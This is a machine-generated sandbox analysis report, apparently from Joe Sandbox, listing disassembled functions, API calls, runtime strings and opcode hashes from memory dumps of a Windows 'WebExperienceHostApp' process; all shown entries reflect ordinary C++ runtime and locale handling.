                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                    • API String ID: 2003779279-1866435925
                                                                    • Opcode ID: 18c4eb03d72117c3613aa7784f1bf35228662092d537acc2669780a054874281
                                                                    • Instruction ID: d40f94498d3bc4c8c475779c785c9566b2679cf570e858b8924fe9f886d8b8d7
                                                                    • Opcode Fuzzy Hash: 18c4eb03d72117c3613aa7784f1bf35228662092d537acc2669780a054874281
                                                                    • Instruction Fuzzy Hash: F821AF66A1964792EA10DB54E6413B96BA0FB90B84F844032DB8D47BBBDF3CE5A5C700

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00007FF60BD73238: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF60BD726C9), ref: 00007FF60BD73252
                                                                    • InterlockedPushEntrySList.API-MS-WIN-CORE-INTERLOCKED-L1-1-0 ref: 00007FF60BD7288D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882624863.00007FF60BD71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF60BD70000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882563067.00007FF60BD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882704903.00007FF60BD7E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882737371.00007FF60BD7F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff60bd70000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: EntryInterlockedListPushabort
                                                                    • String ID: $$Windows.ApplicationModel.AppInstance
                                                                    • API String ID: 1923770069-1542873791
                                                                    • Opcode ID: 4ddd20ba726a00b9b6211fbdb94cfa68b2457837ad145f8ff0950f50f8d1477a
                                                                    • Instruction ID: 3d0626f5b01327cf6bba638131f227e49d2f8b9246ffb3e578f7a2258f5b7f4b
                                                                    • Opcode Fuzzy Hash: 4ddd20ba726a00b9b6211fbdb94cfa68b2457837ad145f8ff0950f50f8d1477a
                                                                    • Instruction Fuzzy Hash: F631F821B44A0699FB08DB61D8513EC6774BB4D748FA08672CE0EDA6A5EFB8D549C340

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 366 7ffe13306430-7ffe1330644d 367 7ffe1330646c-7ffe13306482 RtlPcToFileHeader 366->367 368 7ffe1330644f-7ffe13306452 366->368 370 7ffe13306484-7ffe13306487 367->370 371 7ffe13306493-7ffe133064cf RaiseException 367->371 368->367 369 7ffe13306454-7ffe13306462 368->369 369->367 372 7ffe13306489-7ffe1330648c 370->372 373 7ffe1330648e 370->373 372->371 372->373 373->371
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFileHeaderRaise
                                                                    • String ID: csm
                                                                    • API String ID: 2573137834-1018135373
                                                                    • Opcode ID: 3a8fa3ff98e3fc415a503cae1c61ec6dd809c1b335de595b54931dad9c86390a
                                                                    • Instruction ID: f16a0e02b2ec731935e5cb1a6ed5437b0c654405c748984171233091c81c94f8
                                                                    • Opcode Fuzzy Hash: 3a8fa3ff98e3fc415a503cae1c61ec6dd809c1b335de595b54931dad9c86390a
                                                                    • Instruction Fuzzy Hash: 39114F32A08F8182EB118F16F44026D77A5FB98BA4F284270EE9C17B69DF3CD5518704

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetErrorInfo.OLEAUT32(?,?,?,?,?,?,?,?,?,00007FF60BD75735), ref: 00007FF60BD7306B
                                                                    • SysFreeString.OLEAUT32 ref: 00007FF60BD730FA
                                                                    • SysFreeString.OLEAUT32 ref: 00007FF60BD731FB
                                                                      • Part of subcall function 00007FF60BD75748: iswspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,00007FF60BD731AE,?,?,?,?,?,?,?,?,?,00007FF60BD75735), ref: 00007FF60BD75775
                                                                      • Part of subcall function 00007FF60BD74FF8: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF60BD731F2,?,?,?,?,?,?,?,?,?,00007FF60BD75735), ref: 00007FF60BD7501A
                                                                      • Part of subcall function 00007FF60BD74FF8: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF60BD731F2,?,?,?,?,?,?,?,?,?,00007FF60BD75735), ref: 00007FF60BD75027
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882624863.00007FF60BD71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF60BD70000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882563067.00007FF60BD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882704903.00007FF60BD7E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882737371.00007FF60BD7F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff60bd70000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Free$HeapString$ErrorInfoProcessiswspace
                                                                    • String ID:
                                                                    • API String ID: 1871405674-0
                                                                    • Opcode ID: af1a7296eed4c721050ecdce830b80138dec2ab0313aaa0980fcd02fb34735b4
                                                                    • Instruction ID: 6b82f109d87e43492c709c9ac49f4f1866d886d037803f41766b6792cfa85cbe
                                                                    • Opcode Fuzzy Hash: af1a7296eed4c721050ecdce830b80138dec2ab0313aaa0980fcd02fb34735b4
                                                                    • Instruction Fuzzy Hash: B9613C22B55A0285EF08DF65D4500ECB7B0BB4CB98B648632DE0EE7BA4EF78D442D354

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00007FF60BD73238: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF60BD726C9), ref: 00007FF60BD73252
                                                                    • InterlockedPushEntrySList.API-MS-WIN-CORE-INTERLOCKED-L1-1-0 ref: 00007FF60BD7260D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882624863.00007FF60BD71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF60BD70000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882563067.00007FF60BD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882704903.00007FF60BD7E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882737371.00007FF60BD7F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff60bd70000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: EntryInterlockedListPushabort
                                                                    • String ID: Windows.Foundation.Uri
                                                                    • API String ID: 1923770069-1377045113
                                                                    • Opcode ID: 33188ad3fb2252c7f0eb815770db843d7374c1caf147856433e6f14bfcdb147e
                                                                    • Instruction ID: ae9c7701b604bd8fe438e0d775fac76eecb7a390a4ef5a2671d563c2fd717b88
                                                                    • Opcode Fuzzy Hash: 33188ad3fb2252c7f0eb815770db843d7374c1caf147856433e6f14bfcdb147e
                                                                    • Instruction Fuzzy Hash: 4A416F61A45A4699EB08DF60D4503FCA375EB0C78CFA08632DA0EC7AA9EFBCD114C340

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE0028439B,?,?,?,00007FFE00285AE1), ref: 00007FFE00292114
                                                                      • Part of subcall function 00007FFE00284D10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFE00292134,?,?,?,00007FFE0028439B,?,?,?,00007FFE00285AE1), ref: 00007FFE00284D32
                                                                      • Part of subcall function 00007FFE00284D10: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFE00292134,?,?,?,00007FFE0028439B,?,?,?,00007FFE00285AE1), ref: 00007FFE00284D58
                                                                      • Part of subcall function 00007FFE00284D10: memcpy.VCRUNTIME140_APP(?,?,?,00007FFE00292134,?,?,?,00007FFE0028439B,?,?,?,00007FFE00285AE1), ref: 00007FFE00284D70
                                                                    • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE0028439B,?,?,?,00007FFE00285AE1), ref: 00007FFE0029213E
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: setlocale$freemallocmemcpy
                                                                    • String ID:
                                                                    • API String ID: 1663771476-0
                                                                    • Opcode ID: 8737389535b3fe6aa3b246914114041b48a8b76be02f41534b42691da87bcca8
                                                                    • Instruction ID: 7403e75df7652ab46376023d2a5eea075a55ceb2f8a52436b35e62b47cbc1bab
                                                                    • Opcode Fuzzy Hash: 8737389535b3fe6aa3b246914114041b48a8b76be02f41534b42691da87bcca8
                                                                    • Instruction Fuzzy Hash: 60F0BB21709A4352EF09DF56E5441B5A761AF88780B5C843ACF4D4777AFE3CD4548300

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00007FFE002B8040: _lock_locales.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FFE00283832,?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,?), ref: 00007FFE002B804F
                                                                    • std::_Facet_Register.LIBCPMT ref: 00007FFE00283A0B
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Facet_Register_lock_localesstd::_
                                                                    • String ID:
                                                                    • API String ID: 3986400115-0
                                                                    • Opcode ID: 9c1b0536e791d20bf9ccb3a21b4d26e33d38cb7de666908c62162abcb65010a3
                                                                    • Instruction ID: d720f4fad8c023cb675bfaeff5b43b81c19c268ae478f2f0cf1fe361f1426436
                                                                    • Opcode Fuzzy Hash: 9c1b0536e791d20bf9ccb3a21b4d26e33d38cb7de666908c62162abcb65010a3
                                                                    • Instruction Fuzzy Hash: 7F31A326A0AA4381FA06EB95E4502796B65EF84BA0F180531DF5D477BEDF7CE686C300

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882624863.00007FF60BD71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF60BD70000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882563067.00007FF60BD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882704903.00007FF60BD7E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882737371.00007FF60BD7F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff60bd70000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: AcquireExclusiveLock
                                                                    • String ID:
                                                                    • API String ID: 4021432409-0
                                                                    • Opcode ID: f9d6cbe01079829e05a430424aa4c4ad0151c1e49743e8a65c4ac967d15e688f
                                                                    • Instruction ID: 2b5ccd4c19f47a76a4b3609d38736bbc959818c883ecc5df8b9fc76a345dca8b
                                                                    • Opcode Fuzzy Hash: f9d6cbe01079829e05a430424aa4c4ad0151c1e49743e8a65c4ac967d15e688f
                                                                    • Instruction Fuzzy Hash: 0F21A020A4858682F72D9B11E4007F9E360EF5D794F648379D91ECA6F5EFACE444CB00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Name::operator+
                                                                    • String ID: /$[thunk]:$`adjustor{$`local static destructor helper'$`template static data member constructor helper'$`template static data member destructor helper'$`vtordispex{$`vtordisp{$extern "C" $private: $protected: $public: $static $virtual $}'
                                                                    • API String ID: 2943138195-2884338863
                                                                    • Opcode ID: 7932c554000090ef297f9a02f93cd5f0d571843c599553f7c19302f600fa71c8
                                                                    • Instruction ID: f63e5a1ca8a47de833a2e5329c4b3cb34df240228103512aaf11b6afae71cd81
                                                                    • Opcode Fuzzy Hash: 7932c554000090ef297f9a02f93cd5f0d571843c599553f7c19302f600fa71c8
                                                                    • Instruction Fuzzy Hash: 6392E672918F828AEB01CB26E4802BEB7A0FBA4364F500175FA9D576B9DF7CD544CB04
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                    • API String ID: 2003779279-1866435925
                                                                    • Opcode ID: 63270dc61fe217df1c8448f0cbf6375be5a82b8859e87c3c27386a3adc6e9e90
                                                                    • Instruction ID: 30bc27d0a64860d0eca9ea11574d4262c26fab16d222b574d0d2e716960ee344
                                                                    • Opcode Fuzzy Hash: 63270dc61fe217df1c8448f0cbf6375be5a82b8859e87c3c27386a3adc6e9e90
                                                                    • Instruction Fuzzy Hash: 17A23A26609B8681EB14CB19E4907A9BBA0FBC5F84F548036DB8D43B7ADF7DD885C740
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$memchr
                                                                    • String ID: 0123456789-
                                                                    • API String ID: 2740501399-3850129594
                                                                    • Opcode ID: 83d2e7bdc1caf0c4015a5f28662ff156985bf06449f06aa87c59ae0b43f22276
                                                                    • Instruction ID: df39343ad3df3f7aca70ae3a882629823978078c014a513d144164a4907a071c
                                                                    • Opcode Fuzzy Hash: 83d2e7bdc1caf0c4015a5f28662ff156985bf06449f06aa87c59ae0b43f22276
                                                                    • Instruction Fuzzy Hash: ECE29D22A09A8689EB009F29D49437D3BA5FB85B98F545132DB5E077BBDF7DD881C300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: iswdigit$btowclocaleconv
                                                                    • String ID: 0$0
                                                                    • API String ID: 240710166-203156872
                                                                    • Opcode ID: f25cfa4c62369a9808755e00a142ea6129f249c9ed0bca85ae697669705b357f
                                                                    • Instruction ID: 9b254d81bd895d37124b47f436e70bfc1e59af6fc8285fb469e24f8ea3c190b5
                                                                    • Opcode Fuzzy Hash: f25cfa4c62369a9808755e00a142ea6129f249c9ed0bca85ae697669705b357f
                                                                    • Instruction Fuzzy Hash: AE811473A1855786E7218F29E85027A7BE5FFD0B45F584131DF8E463AAEB3CE845C600
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: memchr$_invalid_parameter_noinfo_noreturn$localeconv
                                                                    • String ID: $$0123456789ABCDEFabcdef-+XxPp
                                                                    • API String ID: 2141594249-3344005635
                                                                    • Opcode ID: 977cf47f29f2a8f28e83db93fd44151f08d7bc9cd05665774f6a172dc86905d1
                                                                    • Instruction ID: ae58c0987dc5c402da3dd5c20965de923321f3af5686d6e20835d0e7990abd49
                                                                    • Opcode Fuzzy Hash: 977cf47f29f2a8f28e83db93fd44151f08d7bc9cd05665774f6a172dc86905d1
                                                                    • Instruction Fuzzy Hash: 09D27F2AA0AA8789EF55CF5AD15027C3B61EB90B84F558031DB5E077BACF3DE856C300
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0123456789-+Ee
                                                                    • API String ID: 0-1347306980
                                                                    • Opcode ID: 8a8eef6ea48c1dcaaf896da1b674f1f61d889f311a6dd7990e35ec2479345b38
                                                                    • Instruction ID: ba238a609683e48a80aace2a6c6631d13dcb60ec7ae227a4182ecd88a9eacfde
                                                                    • Opcode Fuzzy Hash: 8a8eef6ea48c1dcaaf896da1b674f1f61d889f311a6dd7990e35ec2479345b38
                                                                    • Instruction Fuzzy Hash: D7C2612AA0AA8785EB55CF59D05027C3FA1EB91B84F648032DB5D177BACF3DE856C310
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: memchr$isdigit$localeconv
                                                                    • String ID: 0$0123456789abcdefABCDEF
                                                                    • API String ID: 1981154758-1185640306
                                                                    • Opcode ID: 47080461fdb72a4bc559756aa2ea0f6e1f8a764b3b904aecea474129a19d88a8
                                                                    • Instruction ID: 81d2f9e1dc2e3f144202f9c2b95198e19ab3c971e2f7c85967a77815240b1a3d
                                                                    • Opcode Fuzzy Hash: 47080461fdb72a4bc559756aa2ea0f6e1f8a764b3b904aecea474129a19d88a8
                                                                    • Instruction Fuzzy Hash: F1912962A0859746F7258B24D4502BA7FE4FBC4B48F489031DFCA477AADA3CE906C742
                                                                    APIs
                                                                      • Part of subcall function 00007FFE002B8040: _lock_locales.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FFE00283832,?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,?,?), ref: 00007FFE002B804F
                                                                      • Part of subcall function 00007FFE002D2B1C: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE00285AA8), ref: 00007FFE002D2B36
                                                                      • Part of subcall function 00007FFE002A43B0: localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,?,?,?,?,00000001,00007FFE0029A86C), ref: 00007FFE002A43F1
                                                                    • _W_Gettnames.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,0000003F,00000000,?,0000003F,?,00007FFE0028FF19), ref: 00007FFE002A5D6B
                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,0000003F,00000000,?,0000003F,?,00007FFE0028FF19), ref: 00007FFE002A5D80
                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,0000003F,00000000,?,0000003F,?,00007FFE0028FF19), ref: 00007FFE002A5D97
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: free$Gettnames_lock_localeslocaleconvmalloc
                                                                    • String ID: O($`S($`S($P(
                                                                    • API String ID: 2855664287-2702908338
                                                                    • Opcode ID: e268c45b8f4311e6bc6082d674872a96692c70c2bb4a740e82dc8fb3dc99b52e
                                                                    • Instruction ID: afa4028fa479703327713d72d35ee8ec54244522b62210970dd89bdf560fb532
                                                                    • Opcode Fuzzy Hash: e268c45b8f4311e6bc6082d674872a96692c70c2bb4a740e82dc8fb3dc99b52e
                                                                    • Instruction Fuzzy Hash: CA824B21E4AA1386EB42DB61D8612BA2BA5AF857C4F484435EB4E473BEDE3CE555C300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Find_elem
                                                                    • String ID: 0123456789-
                                                                    • API String ID: 2867937686-3850129594
                                                                    • Opcode ID: 9a529bd8226e3188403c01f721c91254f1c48c0f7f560601f1bd5291169c5e3b
                                                                    • Instruction ID: 5d0b0be7efb5730804dfed2667be75ced7d6c45f8ef21940e016e4580fce5aeb
                                                                    • Opcode Fuzzy Hash: 9a529bd8226e3188403c01f721c91254f1c48c0f7f560601f1bd5291169c5e3b
                                                                    • Instruction Fuzzy Hash: 65E29226A19A968AEB50CF29D45027D7BB4FB85B84F545032EF4E077AACF3DD981C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
